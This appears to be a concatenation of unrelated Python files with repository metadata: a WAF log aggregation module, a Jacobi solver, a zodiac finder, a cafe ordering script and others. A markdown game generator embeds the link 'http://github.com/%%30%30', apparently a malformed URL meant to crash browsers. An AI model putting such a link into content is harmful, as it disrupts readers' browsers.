            body["query"]["bool"]["should"].append({"match_phrase": {"message": rule}})
        try:
            results = es.search(index=WAF_INDEX, body=body,
                                ignore_unavailable=True)  # query ES
            total_count[_level] = results['hits']['total']  # all-time total for this category
            # The aggregation is bounded to the last 7 days, but extended_bounds
            # can only widen the range, never shrink it, so the [-7:] slice is required!
            for _result in results['aggregations']['week_history']['buckets'][-7:]:  # buckets are ordered by date ascending
                week_aggr_dict[_level].append(_result['doc_count'])  # stored oldest-first
            # total_count[_level] = results['hits']['total'] # all-time total for this category
        except Exception as e:
            logger.error(e)
        if not week_aggr_dict[_level]:  # when the index is missing the list stays empty; backfill zeros
            week_aggr_dict[_level] = [0, 0, 0, 0, 0, 0, 0]
    return week_aggr_dict, total_count
def get_waf_log_aggregations_days():
    """
    Per-day wafLog counts for the last 10 days (today included).

    :return: {"date": [10 "MM-DD" strings, oldest first],
              "limit": 100,
              "count": [10 per-day counts, oldest first]}
    """
    days = []   # last 10 dates
    count = []  # per-day attack counts for those dates
    today = datetime.date.today()
    early_day = today - datetime.timedelta(days=9)
    for _day in range(9, -1, -1):  # dates ordered oldest-first
        days.append((today - datetime.timedelta(days=_day)).strftime("%m-%d"))  # last 10 days
    es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
    body = {
        "query": {
            "bool": {
                "must": [
                    {"match_phrase": {"_type": "wafLog"}}, # must-match: wafLog documents only
                ],
            }
        },
        "size": 0,
        "aggs": { # aggregation
            "week_history": {
                "date_histogram": {
                    "field": "@timestamp", # time field
                    "interval": "day", # bucket per day
                    "format": "yyyy-MM-dd",
                    "min_doc_count": 0,
                    "time_zone": "+08:00", # ES defaults to UTC, so shift by +8
                    "extended_bounds": {"min": str(early_day), "max": str(today)} # last 10 days, today included
                }
            }
        }
    }
    try:
        results = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True)  # query ES
        # The aggregation is bounded to the last 10 days, but extended_bounds can
        # only widen the range, never shrink it, so the [-10:] slice is required!
        for _result in results['aggregations']['week_history']['buckets'][-10:]:  # buckets are ordered by date ascending
            count.append(_result['doc_count'])
    except Exception as e:
        logger.error(e)
    if not count:  # when the index is missing the list stays empty; backfill zeros
        count = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
    return {"date": days, "limit": 100, "count": count}
def get_waf_log_aggregations_city():
    """
    Aggregate attack counts by source city.

    Counts attacker IPs from the wafLog XForwardedFor field via an ES terms
    aggregation, then resolves each IP to a city name (at most 9 cities; the
    remainder is lumped into "其他"/other).

    :return: {"name": [city names], "count": [attack counts]}
    """
    es = Elasticsearch(LOCAL_CONFIG.es_server_ip_port)
    body = {
        "query": {
            "bool": {
                "must": [
                    {"match_phrase": {"_type": "wafLog"}}, # must-match: wafLog documents only
                ],
            }
        },
        "size": 0,
        "aggs": { # aggregation
            "source_ip": { # bucket source IPs by the XForwardedFor field
                "terms": {
                    "field": "XForwardedFor" # buckets default to count-descending order
                }
            }
        }
    }
    ip_list = []
    ip_count_list = []
    try:
        # Query ES.
        results = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True)
        # Buckets arrive sorted by document count, largest first.
        for _result in results['aggregations']['source_ip']['buckets']:
            ip_list.append(_result['key'].strip())
            ip_count_list.append(int(_result['doc_count']))
    except TransportError as e:  # the custom XForwardedFor field is not searchable by default; enable it
        logger.error(e)
        post_data = {"properties": {"XForwardedFor": {"type": "text", "fielddata": "true"}}}  # enable fielddata
        es.indices.put_mapping(index=WAF_INDEX, doc_type="wafLog", body=post_data, ignore_unavailable=True)
        results = es.search(index=WAF_INDEX, body=body, ignore_unavailable=True)  # retry the query
        for _result in results['aggregations']['source_ip']['buckets']:  # count-descending, as above
            ip_list.append(_result['key'].strip())
            ip_count_list.append(int(_result['doc_count']))
        logger.info("The error above has been fixed")
    except Exception as e:
        logger.error(e)
    ip_geo_resolver = IpToCoordinate()  # resolves geo data from an IP
    city_list = []
    attack_count = []
    for i, _ip in enumerate(ip_list):
        if len(city_list) >= 9:
            break
        try:  # skip IPs that are malformed or have no geo result
            ip_information = ip_geo_resolver.get_information_by_ip(_ip)  # geo info for the attacker IP
            # Was a stray print() polluting stdout; demoted to debug logging.
            logger.debug("ip_information=%s", ip_information)
            city_name = ip_information["city"]["names"]["zh-CN"]  # Chinese city name
            if ip_information["country"]["names"]["en"] != "China":  # append the English name for foreign cities
                city_name += " " + ip_information["city"]["names"]["en"]
            city_list.append(city_name)
            attack_count.append(ip_count_list[i])
        except ValueError as e:  # raised for an invalid IP
            logger.error("wrong ip:" + str(e))
        except KeyError as e:  # raised when a geo dict key is missing
            logger.error(str(e))
    diff = sum(ip_count_list) - sum(attack_count)  # attacks not attributed to a listed city
    if diff != 0:
        city_list.append("其他")  # "other" bucket absorbs the difference
        attack_count.append(diff)
    if len(city_list) == 0:  # the frontend renders nothing for empty data, so add a "none" entry
        city_list.append("无")
        attack_count.append(1)  # value 1
    return {"name": city_list, "count": attack_count}
def get_range_of_last_interval(interval=10):
    """Return (start, end) timestamps covering the last ``interval`` seconds.

    Both are formatted like "2017-01-01T00:00:00.000Z". The current local
    time is shifted back 8 hours to get UTC (assumes a UTC+8 host, matching
    the rest of this module).

    :param interval: window length in seconds
    :return: (start_timestamp, end_timestamp) strings
    """
    end = datetime.datetime.now() - datetime.timedelta(hours=8)  # local time -> UTC
    start = end - datetime.timedelta(seconds=interval - 1)
    stamp = '%Y-%m-%dT%H:%M:%S'
    return start.strftime(stamp) + ".000Z", end.strftime(stamp) + ".000Z"
def get_seconds_of_interval(interval=10):
    """
    Return the last ``interval`` wall-clock seconds as "HH:MM:SS" strings,
    oldest first and ending at the current second.

    :param interval: number of seconds to cover
    :return: list of ``interval`` time strings
    """
    seconds = []
    now = time.time()
    for i in range(interval):
        # Fix: the offset was hard-coded as (9 - i), which was only correct
        # for the default interval of 10; generalized to any interval.
        t = now - (interval - 1 - i)  # timestamp arithmetic is in seconds
        seconds.append(time.ctime(t)[11:19])
    return seconds
def get_datas_of_interval(interval=10):
    """Return a zero-filled list of length ``interval`` (per-second counters).

    :param interval: number of slots
    :return: list of ``interval`` zeros
    """
    # Idiomatic replacement for the append-in-a-loop original.
    return [0] * interval
| [
"jorelin0924@gmail.com"
] | jorelin0924@gmail.com |
6269ee728324127ee62aa78090ebac112614e251 | 80873f43da689b46bdf42d850365d53899c05242 | /Jacobi_GaussSeidel/jacobi.py | 23b7729249f1e7311c73700930c6161c99ef6b86 | [] | no_license | dhimoyee-sumatra/scientific_computing | 30b4146c8bc2fec7a39e5cc6a95081b80bacc7c0 | cd489c26f390c75975c5cd4cf260158832bf6d42 | refs/heads/master | 2020-03-08T01:51:48.441229 | 2018-04-03T03:02:11 | 2018-04-03T03:02:11 | 127,842,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 771 | py | import numpy as np
import matplotlib.pyplot as plt
import scipy.linalg as scp
def jacobi(a, b, xc):
tol = .5e-6
n= len(b)
d=[a[i, i] for i in range(n)]
r= a - np.diag(d)
x= np.zeros((n,1))
bb= np.reshape(b, (n,1))
dd= np.reshape(d, (n,1))
k=0
while(np.abs(xc-x).max()> tol):
x=(bb-np.dot(r,x))/dd
k=k+1
print k
backErrMat = b - a.dot(x)
backErr = np.abs(backErrMat).max()
print "Backward Error: ", backErr
return x
def makeMatrix(n):
    """Build the n-by-n tridiagonal matrix with 3 on the main diagonal
    and -1 on the first sub- and super-diagonals."""
    main_diag = np.diag([3] * n)
    upper = np.diag([-1] * (n - 1), 1)
    lower = np.diag([-1] * (n - 1), -1)
    return main_diag + upper + lower
def makeVector(n):
    """Right-hand-side column vector: 2 at both ends, 1 in the interior."""
    b = np.ones((n, 1))
    b[0] = 2
    b[n - 1] = 2
    return b
# Solve the 100x100 tridiagonal system A x = b. The exact solution is the
# all-ones vector, which jacobi() uses as its convergence reference.
a1= makeMatrix(100)
b1= makeVector(100)
x1= np.ones((100,1))
print jacobi(a1, b1, x1)
| [
"dhimo22s@mtholyoke.edu"
] | dhimo22s@mtholyoke.edu |
d412b8ebe52fafa4e127bd0961f02f1ae6a5f0da | eaee84243b3ea7ee71cdbf5e3d6f471d1fca4ee1 | /src/game.py | 3080b39293b7b726d0ebc3ae99108f194647f8cf | [] | no_license | busterroni/3030 | 4b608f4a69a7d170c267d4370d88121d1a412d30 | 8ed77beb4565d813e1d4aa602c84f964170bf2c7 | refs/heads/master | 2021-01-15T23:20:56.436694 | 2015-09-20T23:25:54 | 2015-09-20T23:27:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | #!/usr/bin/env python
# coding: utf-8
SEP = '\n<!-- GAME -->\n'
def get_between_sep(fname, sep):
with open(fname, 'rb') as f:
contents = f.read()
parts = contents.split(sep)
assert len(parts) == 3
return parts
# Map of board characters to markdown cells: ' ' becomes a lollipop,
# '.' becomes a tree linked through the "[dead]" reference emitted later.
table = {
    ' ': '🍭',
    '.': '[🌲][dead]',
}
def make_game_iter(iter):
    """Yield one rendered markdown row per input line, followed by the
    link definition backing the "[dead]" reference used by tree cells."""
    for raw in iter:
        stripped = raw.rstrip('\n')
        cells = [table[ch] for ch in stripped]
        yield ' '.join(cells) + ' '
    yield '[dead]: http://github.com/%%30%30'
def make_game(fname):
    """Render the board file *fname* into the markdown game text.

    The input file is now closed deterministically via a context manager
    instead of being left open for the garbage collector.
    """
    with open(fname, 'rb') as f:
        return '\n'.join(make_game_iter(f))
def main(game_fname, doc_fname):
    """Regenerate the GAME section of *doc_fname* from the board in
    *game_fname*, leaving the surrounding document untouched."""
    before, _, after = get_between_sep(doc_fname, SEP)
    rebuilt = SEP.join([before, make_game(game_fname), after])
    with open(doc_fname, 'wb') as out:
        out.write(rebuilt)
    return 0
##
class ProgramError(Exception):
    """Expected, user-facing error: printed to stderr without a traceback."""
    pass
def run():
    """Command-line entry point (Python 2): call main() with CLI args and
    turn expected errors into stderr messages instead of tracebacks."""
    from sys import argv, stderr
    try:
        exit(main(*argv[1:]) or 0)
    except ProgramError, exc:
        print >> stderr, exc
    except TypeError, exc:
        # A TypeError from calling main() itself means a wrong argument
        # count; anything raised deeper inside main() is re-raised.
        if exc.message.startswith("main() takes"):
            print >> stderr, exc
        else:
            raise
if __name__ == '__main__':
    run()  # script entry point
| [
"interestinglythere@gmail.com"
] | interestinglythere@gmail.com |
240b8bac2f0652b595726e36702120548cb29b54 | 48894ae68f0234e263d325470178d67ab313c73e | /inv/management/commands/l3-topology.py | ddbb5633ba7c4973bf42b331a10bd0388bbe360e | [
"BSD-3-Clause"
] | permissive | DreamerDDL/noc | 7f949f55bb2c02c15ac2cc46bc62d957aee43a86 | 2ab0ab7718bb7116da2c3953efd466757e11d9ce | refs/heads/master | 2021-05-10T18:22:53.678588 | 2015-06-29T12:28:20 | 2015-06-29T12:28:20 | 118,628,133 | 0 | 0 | null | 2018-01-23T15:19:51 | 2018-01-23T15:19:51 | null | UTF-8 | Python | false | false | 7,640 | py | # -*- coding: utf-8 -*-
##----------------------------------------------------------------------
## L3 topology
##----------------------------------------------------------------------
## Copyright (C) 2007-2012 The NOC Project
## See LICENSE for details
##----------------------------------------------------------------------
## Python modules
import os
import tempfile
import subprocess
from optparse import make_option
from collections import namedtuple, defaultdict
## Django modules
from django.core.management.base import BaseCommand, CommandError
## NOC modules
from noc.ip.models.vrf import VRF
from noc.sa.models.managedobject import ManagedObject
from noc.inv.models.forwardinginstance import ForwardingInstance
from noc.inv.models.subinterface import SubInterface
from noc.lib.ip import IP
from noc.lib.validators import is_rd
class Command(BaseCommand):
    """Django management command (Python 2): render the L3 topology of the
    network as a Graphviz graph — managed objects as boxes, IP prefixes as
    ellipses, connected by their subinterfaces. Output goes to stdout, a
    .dot file, or through a Graphviz layout engine to PDF."""
    help = "Show L3 topology"
    # NOTE(review): "cicro" looks like a typo of the Graphviz engine "circo";
    # left unchanged here since it is a runtime value users may pass.
    LAYOUT = ["neato", "cicro", "sfdp", "dot", "twopi"]
    option_list = BaseCommand.option_list + (
        make_option("--afi", dest="afi",
                    action="store", default="4",
                    help="AFI (ipv4/ipv6)"),
        make_option("--vrf", dest="vrf", action="store",
                    help="VRF Name/RD"),
        make_option("-o", "--out", dest="output", action="store",
                    help="Save output to file"),
        make_option("--core", dest="core", action="store_true",
                    help="Reduce to network core"),
        make_option("--layout", dest="layout", action="store",
                    default="sfdp",
                    help="Use layout engine: %s" % ", ".join(LAYOUT)),
        make_option("--exclude", dest="exclude", action="append",
                    help="Exclude prefix from map"),
    )
    # One subinterface record: owning object id, interface name,
    # forwarding instance id, address, and its network prefix.
    SI = namedtuple("SI", ["object", "interface", "fi", "ip", "prefix"])
    IPv4 = "4"
    IPv6 = "6"
    # Output extensions handed to Graphviz, mapped to its -T format flag.
    GV_FORMAT = {
        ".pdf": "pdf"
    }

    def handle(self, *args, **options):
        """Validate options, collect subinterfaces, and emit the graph."""
        # Check AFI: accept "4"/"6" optionally prefixed with "ip"/"ipv".
        afi = options["afi"].lower()
        if afi.startswith("ipv"):
            afi = afi[3:]
        elif afi.startswith("ip"):
            afi = afi[2:]
        if afi not in ("4", "6"):
            raise CommandError("Invalid AFI: Must be one of 4, 6")
        # Check graphviz options
        ext = None
        if options["output"]:
            ext = os.path.splitext(options["output"])[-1]
            if ext in self.GV_FORMAT:
                # @todo: Check graphviz
                pass
            # NOTE(review): `ext not in ".dot"` is a substring test, so any
            # substring of ".dot" (e.g. "t", or "") is accepted; `ext != ".dot"`
            # was probably intended. Left unchanged in this documentation pass.
            elif ext not in ".dot":
                raise CommandError("Unknown output format")
        if options["layout"] not in self.LAYOUT:
            raise CommandError("Invalid layout: %s" % options["layout"])
        exclude = options["exclude"] or []
        # Check VRF: accept a VRF name, or a raw route distinguisher;
        # default "0:0" is the global table.
        rd = "0:0"
        if options["vrf"]:
            try:
                vrf = VRF.objects.get(name=options["vrf"])
                rd = vrf.rd
            except VRF.DoesNotExist:
                if is_rd(options["vrf"]):
                    rd = options["vrf"]
                else:
                    raise CommandError("Invalid VRF: %s" % options["vrf"])
        # Per-run caches and the prefix connectivity counter used by --core.
        self.mo_cache = {}
        self.fi_cache = {}
        self.rd_cache = {}
        self.p_power = defaultdict(int)
        out = ["graph {"]
        out += ["    node [fontsize=12];"]
        out += ["    edge [fontsize=8];"]
        out += ["    overlap=scale;"]
        # out += ["    splines=true;"]
        objects = set()
        prefixes = set()
        interfaces = list(self.get_interfaces(afi, rd, exclude=exclude))
        if options["core"]:
            # Keep only prefixes shared by more than one subinterface.
            interfaces = [si for si in interfaces if self.p_power[si.prefix] > 1]
        for si in interfaces:
            o_id = "o_%s" % si.object
            p_id = "p_%s" % si.prefix.replace(".", "_").replace(":", "__").replace("/", "___")
            if si.object not in objects:
                objects.add(si.object)
                o = self.get_object(si.object)
                if not o:
                    continue
                out += ["    %s [shape=box;style=filled;label=\"%s\"];" % (o_id, o.name)]
            if si.prefix not in prefixes:
                prefixes.add(si.prefix)
                out += ["    %s [shape=ellipse;label=\"%s\"];" % (p_id, si.prefix)]
            out += ["    %s -- %s [label=\"%s\"];" % (o_id, p_id, si.interface)]
        out += ["}"]
        data = "\n".join(out)
        if ext is None:
            print data
        elif ext == ".dot":
            with open(options["output"], "w") as f:
                f.write(data)
        else:
            # Pass to graphviz
            with tempfile.NamedTemporaryFile(suffix=".dot") as f:
                f.write(data)
                f.flush()
                subprocess.check_call([
                    options["layout"],
                    "-T%s" % self.GV_FORMAT[ext],
                    "-o%s" % options["output"],
                    f.name
                ])

    def get_interfaces(self, afi, rd, exclude=None):
        """
        Returns a list of SI

        Generator over subinterfaces of the given AFI belonging to the
        given RD, skipping loopback/link-local/host addresses and any
        prefix listed in *exclude*. Also increments self.p_power per prefix.
        """
        def check_ipv4(a):
            # Reject loopback, link-local, host routes and unspecified.
            if (a.startswith("127.") or a.startswith("169.254") or
                a.endswith("/32") or a.startswith("0.0.0.0")):
                return False
            else:
                return True

        def check_ipv6(a):
            # Reject only the loopback address.
            if a == "::1":
                return False
            else:
                return True

        exclude = exclude or []
        si_fields = {"_id": 0, "name": 1, "forwarding_instance": 1,
                     "managed_object": 1}
        if afi == self.IPv4:
            check = check_ipv4
            get_addresses = lambda x: x.get("ipv4_addresses", [])
            AFI = "IPv4"
            si_fields["ipv4_addresses"] = 1
        elif afi == self.IPv6:
            check = check_ipv6
            get_addresses = lambda x: x.get("ipv6_addresses", [])
            AFI = "IPv6"
            si_fields["ipv6_addresses"] = 1
        else:
            raise NotImplementedError()
        for si in SubInterface._get_collection().find({"enabled_afi": AFI}, si_fields):
            if rd != self.get_rd(si["managed_object"], si.get("forwarding_instance")):
                continue
            # De-duplicate prefixes per subinterface; excluded prefixes are
            # pre-seeded so they are never yielded.
            seen = set(exclude)
            for a in [a for a in get_addresses(si) if check(a)]:
                prefix = str(IP.prefix(a).first)
                if prefix in seen:
                    continue
                seen.add(prefix)
                self.p_power[prefix] += 1
                yield self.SI(si["managed_object"], si["name"],
                              si.get("forwarding_instance"), a,
                              prefix)

    def get_object(self, o):
        """
        Returns ManagedObject instance

        Cached by id in self.mo_cache; missing objects cache as None.
        """
        mo = self.mo_cache.get(o)
        if not mo:
            try:
                mo = ManagedObject.objects.get(id=o)
            except ManagedObject.DoesNotExist:
                mo = None
            self.mo_cache[o] = mo
        return mo

    def get_rd(self, object, fi):
        """Resolve the route distinguisher for (managed object, forwarding
        instance), cached in self.rd_cache; None marks missing data."""
        rd = self.rd_cache.get((object, fi))
        if not rd:
            if fi:
                f = ForwardingInstance.objects.filter(id=fi).first()
                if f:
                    rd = f.rd
                else:
                    rd = None  # Missed data
            else:
                o = self.get_object(object)
                if o:
                    if o.vrf:
                        rd = o.vrf.rd
                    else:
                        rd = "0:0"  # global table
                else:
                    rd = None  # Missed data
            self.rd_cache[object, fi] = rd
        return rd
| [
"dv@nocproject.org"
] | dv@nocproject.org |
f835ecee1a0f433e30a00f11d4e3009d7dfa125e | 77d74e225f172151af23558849faacb8d77cccfd | /zodiac_sign_finder.py | 15c0bd431e2331204e57bb8543f9c1139fecc937 | [] | no_license | balderasdiana/Zodiac-Sign | bc12bbb01b26c13434ac4a02030100160f6f827b | d69a645b74b64b37e7b3e72441a33787b159e412 | refs/heads/master | 2022-11-17T15:43:11.810022 | 2020-07-09T14:04:45 | 2020-07-09T14:04:45 | 266,240,042 | 0 | 1 | null | 2020-07-09T14:04:47 | 2020-05-23T01:22:28 | Python | UTF-8 | Python | false | false | 3,162 | py | # Created by Diana Balderas and Jordan Leich, Original release: 5/17/2020, Updated on 7/8/2020.
# Email jordanleich@gmail.com if you wish to collaborate or work together sometime.
# Instructions: Enter you birth month in lowercase letters and enter your birth date in numbers.
# Imports
import time
import restart
# Main zodiac code finder
def start():
    """Prompt for a birth month and day, validate them, and report the sign.

    Fix: 'may' and 'october' were missing from the accepted-month list even
    though sign branches existed for them, so those birthdays were rejected
    with "Error found!". The month/cusp data is now a single lookup table,
    which also removes the long unreachable elif chain.
    """
    user_month = str(input('In what month were you born? '))
    print()
    time.sleep(1)
    user_date = int(input('What day were you born? '))
    print()
    time.sleep(1)
    if user_date < 1:  # Used when a user sets a birth date lower than 1
        print("Invalid birth date provided!\n")
        time.sleep(2)
        restart.restart()
    elif user_date > 31:  # Used when a user sets a birth date higher than 31
        print("Error found! Your birth date is too high!\n")
        time.sleep(2)
        restart.restart()
    # month -> (first day of the later sign, earlier sign, later sign)
    cusp_table = {
        'january': (20, 'capricorn', 'aquarius'),
        'february': (19, 'aquarius', 'pisces'),
        'march': (21, 'pisces', 'aries'),
        'april': (20, 'aries', 'taurus'),
        'may': (21, 'taurus', 'gemini'),
        'june': (21, 'gemini', 'cancer'),
        'july': (23, 'cancer', 'leo'),
        'august': (23, 'leo', 'virgo'),
        'september': (23, 'virgo', 'libra'),
        'october': (23, 'libra', 'scorpio'),
        'november': (22, 'scorpio', 'sagittarius'),
        'december': (22, 'sagittarius', 'capricorn'),
    }
    month_key = user_month.lower()
    if month_key in cusp_table:
        cusp_day, early_sign, late_sign = cusp_table[month_key]
        user_sign = early_sign if user_date < cusp_day else late_sign
        results(user_sign)
    else:  # Used if the users birth month is not recognized or found
        print("Error found!\n")
        time.sleep(2)
        restart.restart()
def results(user_sign):
    """Announce the computed zodiac sign, then hand off to the restart prompt."""
    time.sleep(1)
    print('Your zodiac sign is a {0}!\n'.format(user_sign))
    time.sleep(2)
    restart.restart()
start()  # launch the interactive prompt when the module is run
| [
"noreply@github.com"
] | balderasdiana.noreply@github.com |
c876d63d1c3f174c77f59f76300e1d3fced9457f | d8348786332e8d60ae83f7da643efcd545801401 | /png2ass.py | 16b4c487ca72b7ab682c91d6b5b45df325e4cdb9 | [
"MIT"
] | permissive | emako/png2ass | 73deaad0929286899ed3ff201f53b37f717e159f | 77ee424dc032a343d1d3fde7a2946d1ee36af8d6 | refs/heads/master | 2020-04-09T04:26:44.036760 | 2018-12-02T07:25:04 | 2018-12-02T07:25:04 | 160,023,441 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,214 | py | # -*- coding: utf-8 -*-
import sys
from tcaxPy import *
try:
input = sys.argv[1]
except:
print('Error: none input image file!')
sys.exit()
output = input
width = 1280
height = 720
ass_header = """[Script Info]\r
; This script is generated by png2ass powered by TCAX 1.2.0\r
; Welcome to TCAX forum http://tcax.org\r
ScriptType: v4.00+\r
Collisions:Normal\r
PlayResX:{width}\r
PlayResY:{height}\r
Timer:100.0000\r
\r
[V4+ Styles]\r
Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\r
Style: TCMS,Arial,30,&H00FF0000,&HFFFF0000,&H000000FF,&HFF000000,0,0,0,0,100,100,0,0,0,1,0,5,15,15,10,1\r
Style: TCPS,Arial,1,&HFFFFFFFF,&HFFFFFFFF,&HFFFFFFFF,&HFFFFFFFF,0,0,0,0,100,100,0,0,0,0,0,7,0,0,0,1\r
\r
[Events]\r
Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\r
\r""".format(width=width, height=height)
data = {
val_OutFile : output,
val_AssHeader : ass_header,
val_ResolutionX : width,
val_ResolutionY : height,
}
def png2ass():
    """Convert the input PNG into an ASS subtitle file: one positioned,
    colored 1x1 "pixel" event per non-transparent image pixel, centered
    on the configured script resolution."""
    file_name = GetVal(val_OutFile) + '.ass'
    ass_header = GetVal(val_AssHeader)
    ASS_FILE = CreateAssFile(file_name, ass_header)
    ASS_BUF = []
    PIX = ImagePix((input))
    # NOTE(review): PIX appears to be ((x_off, y_off), (width, height),
    # flat RGBA byte data) — inferred from the indexing below; confirm
    # against the tcaxPy ImagePix documentation.
    dx = (GetVal(val_ResolutionX) - PIX[1][0]) / 2 - PIX[0][0]  # x middle of the screen
    dy = (GetVal(val_ResolutionY) - PIX[1][1]) / 2 - PIX[0][1]  # y middle of the screen
    ## -- pix convert start
    initPosX = dx + PIX[0][0]
    initPosY = dy + PIX[0][1]
    for h in range(PIX[1][1]):
        posY = initPosY + h
        for w in range(PIX[1][0]):
            posX = initPosX + w
            idx = 4 * (h * PIX[1][0] + w)  # 4 bytes (RGBA) per pixel
            pixR = PIX[2][idx + 0]
            pixG = PIX[2][idx + 1]
            pixB = PIX[2][idx + 2]
            pixA = PIX[2][idx + 3]
            if pixA != 0:
                # Fully transparent pixels are skipped; others become one
                # dialogue line with position, color and alpha overrides.
                ass_main(ASS_BUF, SubL(0, 1000, 0, Pix_Style), pos(posX, posY) + color1(FmtRGB(pixR, pixG, pixB)) + alpha1(255 - pixA), PixPt())
    ## -- pix convert end
    WriteAssFile(ASS_FILE, ASS_BUF)  # write the buffer in memory to the file
    FinAssFile(ASS_FILE)
if __name__ == "__main__":
    tcaxPy_InitData(data)  # hand resolution/header/output settings to tcaxPy
    png2ass()
"noreply@github.com"
] | emako.noreply@github.com |
8bbdbcdf581968d290040b5000ecbce9b3daa08b | 9e1f4824c724631208fcc8fe1f16945947630427 | /venv/Scripts/django-admin.py | c486558899b36107b2b8fb7c2efd172340e5a722 | [] | no_license | gilbenhamo/EasyShop | d7596af2db4a06978664579634e5fda58f9cc7b1 | 5839e722d8684ed9dc34a48bebc7caad10b17f87 | refs/heads/master | 2023-07-12T00:06:52.837652 | 2021-01-08T15:25:05 | 2021-01-08T15:25:05 | 664,358,524 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | #!C:\EasyShop-ziv\venv\Scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings

from django.core import management

try:
    from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
    # On Django >= 4.0 the warning class is gone: refuse to run at all.
    raise ImportError(
        'django-admin.py was deprecated in Django 3.1 and removed in Django '
        '4.0. Please manually remove this script from your virtual environment '
        'and use django-admin instead.'
    )

if __name__ == "__main__":
    # Warn once, then delegate to the normal django-admin command line.
    warnings.warn(
        'django-admin.py is deprecated in favor of django-admin.',
        RemovedInDjango40Warning,
    )
    management.execute_from_command_line()
| [
"gilbh859@gmail.com"
] | gilbh859@gmail.com |
8a669159d71e65a34188db691932a5319de7f270 | a7d12129e0b36046cfd6f95fbe0842b5bad69f92 | /ArchiveRec/hello_world/urls.py | e3c3cf6a5b3438d4a54525d5b60fbf464498435b | [] | no_license | BenjaminJenney/ArchiveRec | c46fd33085626838d4986388ce4c3a6ee682fda5 | ab11b3f3635c6c220ce9da5abefbbb8f7d9188e8 | refs/heads/main | 2023-08-21T11:21:08.203710 | 2021-10-08T15:25:43 | 2021-10-08T15:25:43 | 415,033,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from django.urls import path
from hello_world import views
urlpatterns = [
path('', views.hello_world, name='hello_world')
]
| [
"benjenns@gmail.com"
] | benjenns@gmail.com |
703e7427495b97d7a885aa45eea1606e2660b7a2 | 8061b2ce49387b26b51c9634612c837ae3bd38e2 | /main1.py | af7d095de9dec7acd088b9b503ee18b696f531c8 | [] | no_license | Carine-SHS-Digital-Tech/intro-to-github-JardanSus | 3932942159ebda94ab839d8d38087c775756463e | e052f4a2885deb24f756a2ec4e818276f364c70b | refs/heads/main | 2023-06-27T17:47:26.222065 | 2021-08-01T08:54:35 | 2021-08-01T08:54:35 | 379,786,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,086 | py | menu = ["Cappuccino", "Espresso", "Latte", "Iced Coffee"]
# Price list aligned by index with the `menu` list defined above.
prices = [3, 2.25, 2.50, 2.50]
gst = float(0.1)        # 10% goods-and-services tax
takeAway = float(0.05)  # 5% takeaway surcharge
count = 0               # number of order lines entered
total = 0               # running order total
x = 0                   # NOTE(review): never used
orderItems = []         # human-readable "item * qty" strings
orderPrice = []         # line totals, parallel to orderItems
nextItem = True
choice = input("Hi, welcome to Cafe au Lait\nWould you like takeaway [T] or Dine in [D]? ")
print("Here is the menu:\n ")
print("$3.00 " + menu[0])
print("$2.25 " + menu[1])
print("$2.50 " + menu[2])
print("$2.50 " + menu[3])
print("\nTo complete order, enter [Done] ")
# Order-entry loop: one branch per menu item; "Done" ends the loop.
while nextItem:
    order = input("Enter Item: ")
    if order == "Cappuccino":
        qty = int(input("Enter Quantity: "))
        orderItems.append(menu[0] + " * " + str(qty))
        orderPrice.append(prices[0] * qty)
        count = count + 1
        total = total + prices[0] * qty
    elif order == "Espresso":
        qty = int(input("Enter Quantity: "))
        orderItems.append(menu[1] + " * " + str(qty))
        orderPrice.append(prices[1] * qty)
        count = count + 1
        total = total + prices[1] * qty
    elif order == "Latte":
        qty = int(input("Enter Quantity: "))
        orderItems.append(menu[2] + " * " + str(qty))
        orderPrice.append(prices[2] * qty)
        count = count + 1
        total = total + prices[2] * qty
    elif order == "Iced Coffee":
        qty = int(input("Enter Quantity: "))
        orderItems.append(menu[3] + " * " + str(qty))
        orderPrice.append(prices[3] * qty)
        count = count + 1
        total = total + prices[3] * qty
    elif order == "Done":
        nextItem = False
    else:
        print("Invalid input / item not on menu")
# Apply GST to every order; the takeaway surcharge only when choice is "T".
if choice == "T":
    total = total + total * takeAway + total * gst
else:
    total = total + total * gst
print("Here is your order summary:")
a = 0
subTotal = sum(orderPrice)
while a < count:
    print("Item: " + orderItems[a])
    print("Price: $" + str(orderPrice[a]))
    a = a + 1
print("\nSubtotal: $" + str(sum(orderPrice)))
print("GST: $" + str(subTotal * gst))
# NOTE(review): the surcharge line prints for dine-in orders too, although it
# is only added to the total for takeaway -- confirm intent.
print("Surcharge: $" + str(subTotal * takeAway))
print("The total price of your order is: $" + str(total))
"noreply@github.com"
] | Carine-SHS-Digital-Tech.noreply@github.com |
3ff886427d0bbc511c3a10a0eb2bf4b511510cf6 | 89141c20942b9cfd9259693d4e17eb4328c92e1a | /Game/Games/Encrypter/Encrypter_gui.py | a73038f52b2adbe36efc56d8b3153a04ff16f57a | [
"MIT"
] | permissive | AnirbanBanik1998/Modern_Speak_and_Spell | 3647d29fd524a192a1bba3249a937bb138a8e9b4 | 18a00fd137d11f3d52055efc64cc3ae5c715412b | refs/heads/master | 2021-04-15T14:51:18.902173 | 2018-08-30T15:40:23 | 2018-08-30T15:40:23 | 126,737,696 | 6 | 4 | null | null | null | null | UTF-8 | Python | false | false | 8,710 | py | import pygame
import Encrypter
import subprocess
import sys
sys.path.insert(0, "../../../")
from API import recorder, edit
def message(msg, color, width, height, font_size, center=False, bg=None):
    '''
    Function to display a specific message in a specific position with a specific color.
    :param msg: The text to be displayed.
    :param color: The font color.
    :param width: The horizontal position of the text on the screen.
    :param height: The vertical position of the text on the screen.
    :param font_size: The font size of the text.
    :param center: Boolean value to determine if text will be aligned to the center or not.
